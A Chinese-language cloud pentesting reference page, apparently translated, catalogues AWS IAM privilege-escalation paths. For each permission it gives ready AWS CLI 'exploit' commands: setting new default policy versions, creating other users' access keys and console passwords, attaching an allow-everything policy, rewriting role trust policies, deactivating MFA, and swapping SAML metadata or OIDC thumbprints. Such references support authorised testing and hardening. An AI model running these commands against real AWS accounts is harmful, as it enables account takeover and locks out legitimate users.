IAM
有关 IAM 的更多信息,请查看:
iam:CreatePolicyVersion
授予创建新的 IAM 策略版本的能力,通过使用 --set-as-default
标志绕过 iam:SetDefaultPolicyVersion
权限的需求。这使得定义自定义权限成为可能。
利用命令:
Copy aws iam create-policy-version --policy-arn < target_policy_ar n > \
--policy-document file:///path/to/administrator/policy.json --set-as-default
影响: 通过允许对任何资源执行任何操作,直接提升权限。
iam:SetDefaultPolicyVersion
允许将IAM策略的默认版本更改为另一个现有版本,如果新版本具有更多权限,则可能提升权限。
Bash命令:
Copy aws iam set-default-policy-version --policy-arn < target_policy_ar n > --version-id v2
影响: 通过启用更多权限进行间接权限提升。
iam:CreateAccessKey
允许为另一个用户创建访问密钥 ID 和秘密访问密钥,从而导致潜在的权限提升。
利用:
Copy aws iam create-access-key --user-name < target_use r >
影响: 通过假设其他用户的扩展权限进行直接权限提升。
iam:CreateLoginProfile
| iam:UpdateLoginProfile
允许创建或更新登录配置文件,包括设置AWS控制台登录的密码,从而导致直接权限提升。
创建利用:
Copy aws iam create-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'
利用更新:
Copy aws iam update-login-profile --user-name target_user --no-password-reset-required \
--password '<password>'
影响: 通过以“任何”用户身份登录直接提升权限。
iam:UpdateAccessKey
允许启用已禁用的访问密钥,如果攻击者拥有该禁用密钥,可能导致未经授权的访问。
利用:
Copy aws iam update-access-key --access-key-id < ACCESS_KEY_I D > --status Active --user-name < usernam e >
影响: 通过重新激活访问密钥直接提升权限。
iam:CreateServiceSpecificCredential
| iam:ResetServiceSpecificCredential
允许为特定的AWS服务(例如,CodeCommit,Amazon Keyspaces)生成或重置凭证,继承相关用户的权限。
创建利用:
Copy aws iam create-service-specific-credential --user-name < usernam e > --service-name < servic e >
重置利用:
Copy aws iam reset-service-specific-credential --service-specific-credential-id < credential_i d >
影响: 在用户的服务权限中直接提升特权。
iam:AttachUserPolicy
|| iam:AttachGroupPolicy
允许将策略附加到用户或组,通过继承附加策略的权限直接提升特权。
用户利用:
Copy aws iam attach-user-policy --user-name < usernam e > --policy-arn "<policy_arn>"
针对组的利用:
Copy aws iam attach-group-policy --group-name < group_nam e > --policy-arn "<policy_arn>"
影响: 直接提升到策略所授予的任何权限。
iam:AttachRolePolicy
, ( sts:AssumeRole
|iam:createrole
) | iam:PutUserPolicy
| iam:PutGroupPolicy
| iam:PutRolePolicy
允许将策略附加或放置到角色、用户或组,从而通过授予额外权限实现直接的权限提升。
角色利用:
Copy aws iam attach-role-policy --role-name < role_nam e > --policy-arn "<policy_arn>"
利用内联策略:
Copy aws iam put-user-policy --user-name < usernam e > --policy-name "<policy_name>" \
--policy-document "file:///path/to/policy.json"
aws iam put-group-policy --group-name < group_nam e > --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json
aws iam put-role-policy --role-name < role_nam e > --policy-name "<policy_name>" \
--policy-document file:///path/to/policy.json
您可以使用如下策略:
Copy {
"Version" : "2012-10-17" ,
"Statement" : [
{
"Effect" : "Allow" ,
"Action" : [
"*"
] ,
"Resource" : [
"*"
]
}
]
}
影响: 通过策略添加权限直接提升权限。
iam:AddUserToGroup
允许将自己添加到IAM组中,通过继承组的权限来提升权限。
利用:
Copy aws iam add-user-to-group --group-name < group_nam e > --user-name < usernam e >
影响: 直接提升到该组权限的级别。
iam:UpdateAssumeRolePolicy
允许更改角色的假设角色策略文档,从而启用角色及其相关权限的假设。
利用:
Copy aws iam update-assume-role-policy --role-name < role_nam e > \
--policy-document file:///path/to/assume/role/policy.json
当策略看起来如下所示时,它授予用户假设角色的权限:
Copy {
"Version" : "2012-10-17" ,
"Statement" : [
{
"Effect" : "Allow" ,
"Action" : "sts:AssumeRole" ,
"Principal" : {
"AWS" : "$USER_ARN"
}
}
]
}
影响: 通过假设任何角色的权限进行直接权限提升。
iam:UploadSSHPublicKey
|| iam:DeactivateMFADevice
允许上传用于身份验证到 CodeCommit 的 SSH 公钥和停用 MFA 设备,从而导致潜在的间接权限提升。
SSH 密钥上传的利用:
Copy aws iam upload-ssh-public-key --user-name < usernam e > --ssh-public-key-body < key_bod y >
利用 MFA 禁用:
Copy aws iam deactivate-mfa-device --user-name < usernam e > --serial-number < serial_numbe r >
影响: 通过启用 CodeCommit 访问或禁用 MFA 保护实现间接权限提升。
iam:ResyncMFADevice
允许重新同步 MFA 设备,可能通过操控 MFA 保护导致间接权限提升。
Bash 命令:
Copy aws iam resync-mfa-device --user-name < usernam e > --serial-number < serial_numbe r > \
--authentication-code1 < code 1> --authentication-code2 < code 2>
影响: 通过添加或操纵 MFA 设备进行间接权限提升。
iam:UpdateSAMLProvider
, iam:ListSAMLProviders
, (iam:GetSAMLProvider
)
拥有这些权限后,您可以更改 SAML 连接的 XML 元数据 。然后,您可以利用SAML 联邦 以任何信任它的角色登录 。
请注意,执行此操作后合法用户将无法登录 。但是,您可以获取 XML,因此您可以放入自己的,登录并配置之前的设置。
Copy # List SAMLs
aws iam list-saml-providers
# Optional: Get SAML provider XML
aws iam get-saml-provider --saml-provider-arn < AR N >
# Update SAML provider
aws iam update-saml-provider --saml-metadata-document < valu e > --saml-provider-arn < ar n >
## Login impersonating roles that trust the SAML provider
# Optional: Set the previous XML back
aws iam update-saml-provider --saml-metadata-document < previous-xm l > --saml-provider-arn < ar n >
TODO: 一个能够生成 SAML 元数据并使用指定角色登录的工具
iam:UpdateOpenIDConnectProviderThumbprint
, iam:ListOpenIDConnectProviders
, (iam:
GetOpenIDConnectProvider
)
(不确定)如果攻击者拥有这些 权限 ,他可以添加一个新的 Thumbprint 来管理登录所有信任该提供者的角色。
Copy # List providers
aws iam list-open-id-connect-providers
# Optional: Get Thumbprints used to not delete them
aws iam get-open-id-connect-provider --open-id-connect-provider-arn < AR N >
# Update Thumbprints (The thumbprint is always a 40-character string)
aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn < AR N > --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3
参考文献